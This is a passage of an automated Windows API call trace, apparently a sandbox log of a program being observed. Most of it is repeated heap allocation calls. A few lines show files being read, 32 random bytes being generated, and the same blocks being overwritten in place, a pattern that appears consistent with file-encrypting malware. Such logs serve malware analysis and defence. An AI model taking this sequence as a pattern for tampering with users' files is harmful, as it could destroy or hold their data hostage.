(HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.737] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.737] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.738] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.739] GetProcessHeap () returned 0x4f10000 [0077.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.740] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.741] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.741] WriteFile (in: hFile=0x7e4, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.741] WriteFile (in: hFile=0x7e4, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.741] GetProcessHeap () returned 0x4f10000 [0077.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.742] GetProcessHeap () returned 0x4f10000 [0077.742] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.742] GetProcessHeap () returned 0x4f10000 [0077.742] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.742] CloseHandle (hObject=0x7e4) returned 1 [0077.743] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 27 [0077.743] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.743] ReadFile (in: hFile=0x7e8, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.743] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.743] GetProcessHeap () returned 0x4f10000 [0077.743] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.743] GetProcessHeap () returned 0x4f10000 [0077.743] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.743] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.743] GetProcessHeap () returned 0x4f10000 [0077.743] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.743] ReadFile (in: hFile=0x7e8, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.033] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.033] WriteFile (in: hFile=0x7e8, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.034] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.035] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.035] GetProcessHeap () returned 0x4f10000 [0078.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.036] GetProcessHeap () returned 0x4f10000 [0078.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.036] GetProcessHeap () returned 0x4f10000 [0078.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.036] GetProcessHeap () returned 0x4f10000 [0078.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.036] GetProcessHeap () returned 0x4f10000 [0078.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.041] GetProcessHeap () returned 0x4f10000 [0078.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.042] GetProcessHeap () returned 0x4f10000 [0078.042] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.043] GetProcessHeap () returned 0x4f10000 [0078.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.044] GetProcessHeap () returned 0x4f10000 [0078.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.044] GetProcessHeap () returned 0x4f10000 [0078.044] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.044] SetFilePointerEx (in: hFile=0x7e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.044] WriteFile (in: hFile=0x7e8, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 